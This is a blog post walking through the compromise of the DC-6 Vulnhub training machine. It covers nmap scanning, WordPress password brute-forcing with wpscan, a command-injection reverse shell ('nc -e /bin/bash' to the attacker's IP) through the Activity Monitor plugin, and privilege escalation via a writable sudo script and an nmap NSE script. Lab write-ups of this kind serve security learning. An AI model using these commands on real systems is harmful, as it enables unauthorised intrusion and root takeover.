DC-6 打靶渗透

最新推荐文章于 2024-09-15 16:27:40 发布
最新推荐文章于 2024-09-15 16:27:40 发布
阅读量910 收藏 14
点赞数 29
文章标签: 服务器 linux 网络 web安全 网络安全 经验分享 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65112983/article/details/141136573
版权

一、信息收集

1、查看靶机的MAC地址:

2、查看靶机的ip地址:

nmap 192.168.7.0/24

3、查看靶机开放的端口:

nmap -p- -sC -sT -sV -A 192.168.7.236

4、访问靶机的80端口,发现无法访问但是跳到了一个域名,应该是需要进行修改hosts文件,添加ip到域名的解析:

5、添加好之后进行访问:

6、对网站进行目录扫描:

 dirsearch -u "http://192.168.7.236"

7、拼接目录进行查看是否有有效信息,发现有一个登录的网页:

8、使用wpscan来枚举一下用户,记录下来,弄成一个txt:

wpscan --url http://wordy/ --enumerate u

9、在靶机的官网有密码字典:

cat /usr/share/wordlists/rockyou.txt | grep k01 > password.txt

10、对账号和密码进行爆破:

wpscan --url http://wordy/ -U user.txt -P password.txt

Username: mark, Password: helpdesk01

11、使用账号和密码进行登录:

12、在点击页面功能点时发现页面有一个插件功能:

13、搜索相关nday漏洞,发现有一个Activity Monitor存在的RCE漏洞(CVE-2018-15877),然后在工具处有一个ip的框是漏洞处:

14、输入命令,查看是否有回显:

127.0.0.1| ls /

15、使用bp抓包修改命令为反弹shell的语句:

127.0.0.1| nc -e /bin/bash 192.168.7.200 5555 /

16、kali开启监听:

nc -lvvp 5555

17、查看反弹结果,成功反弹,但是用户权限不高:

18、使用命令获得一个交互式shell:

python -c 'import pty;pty.spawn("/bin/bash")'

二、提权

1、由于使用sudo权限需要输入密码,所以没办法进行sudo提权。在一个用户的文件夹里面有一个txt文件,这个文件里面有另一个用户的密码:

cd /home/mark/stuff

cat things-to-do.txt

账号密码:graham / GSo7isUM1D4

2、使用账号密码进行切换用户:

3、查看用户sudo权限,发现有一个文件但是需要jens身份来使用:

4、查看这个文件,发现是一个解压的脚本:

cat /home/jens/backups.sh

5、向这个脚本写入命令,让jens用户执行成功切换到jens用户:

echo "/bin/bash" >> /home/jens/backups.sh

sudo -u jens /home/jens/backups.sh

6、查看该用户的sudo权限,发现有一个文件是root权限:

7、nmap中执行shell方法,获取root权限:

echo "os.execute('/bin/bash')">/tmp/shell.nse

sudo nmap --script=/tmp/shell.nse

8、查看root目录下面的txt:

cd /root
cat theflag.txt

搬砖小星
关注
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
vuInhub靶场实战系列-DC-6实战
05-29
vuInhub靶场实战系列-DC-6实战
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
DC-DC PCB layout 指导.docx
06-18
6. 在设计 DC-DC PCB 布局时,需要将输入输出电容的 GND 用铜皮进行连接,摆件时两者的地尽量放一起。这样可以减少噪声和干扰,提高 DC-DC 的性能。 7. DC-DC Ton 和 Toff 时的电流路径都应该很短,减少阻抗和寄生...
6-A DC-DC Buck Converter Selection Guide of Mid-range.pdf
10-30
DC-DC降压转换器选择指南 DC-DC降压转换器是一种常用的电源管理器件,能够将高电压降低到低电压...本应用笔记旨在帮助用户更好地选择TI的DC-DC降压转换器产品,以满足中等输入电压和6 A输出步骤降压DC-DC应用的需求。
裸金属服务器与云服务器的区别有哪些?
wanhengwangluo的博客
09-11 475
服务器通常是基于虚拟化技术,云服务器环境中的资源一般会受到其他虚拟机的影响,从而导致一定的波动,但是云服务器与裸金属服务器相比较来说,可以为企业提供更多的灵活性与可扩展性,同时整体的经济成本会较低一点,会更加适用于一些中小型企业和个人用户来进行使用。裸金属服务器相对于云服务器来说有着卓越的性能,因为没有虚拟化层的开销,可以直接访问底层硬件资源,以此来实现更高的计算性能、内存和存储容量,所以裸金属服务器一般会运用在需要处理大规模数据处理和高性能计算等任务当中。
高防服务器的优势与劣势分析
2403_86998484的博客
09-10 454
高防服务器通过持续监控和快速响应网络安全事件,极大地减少了由于网络攻击导致的服务中断,从而确保了业务的连续性。在网络安全威胁日益增加的今天,保障数据的安全是企业信誉的重要部分。高防服务器通常需要更多的资源来维护其高级的安全功能,包括硬件和软件的配置。这使得高防服务器的成本远高于标准服务器,可能需要更多的初期和持续的投资。高防服务器要求专业的知识和技能来进行正确的配置和维护。为了实现强大的安全防护,某些安全措施可能会对服务器的性能产生影响,例如,高强度的流量过滤可能会导致处理速度变慢,影响用户体验。
网站优化与服务器:性能提升的双重奏
2403_86998484的博客
09-14 391
通过优化服务器配置、提升硬件性能、加强安全防护和实施有效的监控与维护,可以显著提升网站的性能和用户体验。网站优化是一个持续的过程,需要服务器和前端技术的协同配合,共同打造快速、稳定、安全的网站。在互联网高速发展的今天,网站的响应速度和用户体验直接影响着用户的留存率和转化率。而服务器作为网站运行的基石,其性能和配置对网站优化起着至关重要的作用。图片和媒体优化:压缩图片和视频,使用合适的格式和分辨率,加快加载速度。服务器的响应速度、稳定性和处理能力直接影响网站的加载时间和运行效率。
基于高通主板的ARM架构服务器
D404234的博客
09-11 1423
但高通在服务器市场面临激烈竞争,联发科在手机芯片市场挑战高通,苹果加快自研芯片使用步伐给高通压力,服务器市场英特尔占主导,高通要成功需克服诸多困难。高通在服务器芯片领域面临挑战,有收购与专利问题,博通收购后高通削减“非核心业务”支出,Intel 市占率高且 Arm 生态和软件不完善,高通在 Arm 服务器芯片市场进展不大,2018 年高通服务器芯片部门裁员约 280 名,占部门总人数一半左右,业务前景充满不确定性。易获取部署,众多供应商,90%主流软件适配,兼容性强,常见系统和程序可顺畅运行。
集群聊天服务器项目【C++】(四)cmake介绍和简单使用
xaiobai123的博客
09-15 330
本章介绍了为什么使用cmake:比手写Makefile简单,cmake安装、vscode配置,以及用cmake编译上一章的代码。但是对于一个复杂的项目,使用cmake还需要其他额外的配置,后面会再详细介绍。
配置全新服务器深度学习一套流程
weixin_70379932的博客
09-10 887
NCU服务器配置深度学习环境
【STM32】esp8266通过MQTT连接服务器|订阅发布
yyqzjw的博客
09-15 348
该协议为应用层协议,传输层使用的是tcp,MQTT的订阅和发布,就相当于在抖音中你关注了某个领域的博主(订阅),如果有其他人发了作品就会推给你(发布),默认已经安装好了简单演示订阅mosquitto_sub 订阅指令-h 主机ip-p 端口号1883-t 主题发布mosquitto_pub 发布指令。
怎么选择适合的服务器
2403_86998484的博客
09-14 473
大家都知道,不管是公司还是个人,在数字化浪潮已经席卷全球的环境下,大家对服务器的需求是日渐增长的。很多人在买服务器的时候,多少都有点选择困难,今天我们就来对比下物理服务器和弹性云服务器,看看选哪个更省心。业务规模:如果你的业务还在起步阶段,或者只是想自己倒腾点东西,比如建steam游戏的服务器、建个人博客、论坛等,那么云服务器应该更适合你。想象一下,物理服务器就像你家的老式冰箱,虽然样子有点过时,但性能稳定,用起来心里踏实。而弹性云服务器,就像是你的智能手机,随时随地,想怎么用就怎么用。
828华为云征文 | 华为云X实例服务器上部署知识图谱项目的详细指南
cooldream2009的博客
09-11 1463
知识图谱作为数据整合、语义分析和人工智能的重要基础,逐渐被广泛应用于各类领域。其通过结构化数据和关系映射,帮助用户更好地理解数据背后的意义。本文将详细介绍如何在华为云X实例服务器上部署一个完整的知识图谱项目,涵盖开发环境JDK、Tomcat应用服务器、Virtuoso图数据库以及MySQL关系型数据库的安装与配置。结合实例的硬件配置,我们将讨论其性能表现,帮助读者理解如何高效利用云服务器资源。
什么是 SMB 服务器以及它如何工作?
网络研究观
09-14 585
在本文中,您将了解 SMB 服务器以及它们如何促进网络文件共享。
Zabbix自定义监控项与触发器
henanchenxuyuan的博客
09-11 1534
Zabbix 中内置了很多监控参数(Key),我们可以通过在客户端配置文件中定义 key,获取监控对象中的系统、CPU、网络、内存、文件系统等信息。Key(键)是 zabbix 标记 item 的键,是一种标识符。利用 key 可以定义一个监控对象,那么这个监控对象肯定是采集数据的,但是采集数据的时候可能存在很多节点与 server 交互,那么需要具体采集哪个节点,就可以用 key 进行采集。
十四,在Spring Boot当中对应“ Tomcat 服务器的相关配置”和“服务器的切换”的详细说明
最新发布
weixin_61635597的博客
09-15 647
Spring Boot 支持的 webServlet: Tomcat,Jetty,or Undertow。Spring Boot 应用启动的是 Web 应用时,web场景包-导入 tomcat支持 Tomcat (也可以是Jetty,Undertow)的配置和切换。“在这个最后的篇章中,我要表达我对每一位读者的感激之情。你们的关注和回复是我创作的动力源泉,我从你们身上吸取了无尽的灵感与勇气。我会将你们的鼓励留在心底,继续在其他的领域奋斗。
在 Ubuntu 下通过 Docker 部署 Misskey 服务器
shelby_loo的博客
09-11 601
Docker 是一个开源的应用容器引擎,它可以让开发者将应用及其依赖打包成一个标准化的容器,从而实现一致的开发、测试和生产环境。使用 Docker 部署应用可以极大地简化环境配置和版本管理。Misskey 是一个基于 Node.js 的社交媒体平台,支持多种功能,如发布状态、评论、私信等。它有着友好的用户界面和强大的扩展性,非常适合个人和小型社区使用。通过 Docker 部署 Misskey,我们可以快速搭建自己的社交媒体平台,而无需深入了解复杂的安装过程。
浪潮信息首推3秒智能控温!告别服务器开机噪音
fanxiaohui12138的博客
09-15 407
在当前的数据中心运维实践中,运维人员在部署服务器时常被“飞机起飞”般的开机噪音所困扰。服务器刚刚接通电源,其内部元件尚处于预热待命状态,而风扇却已全速运转,这不仅加剧了噪音污染,还拖慢了启动速度,有时开机甚至需要数分钟之久,严重制约了运维效率。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值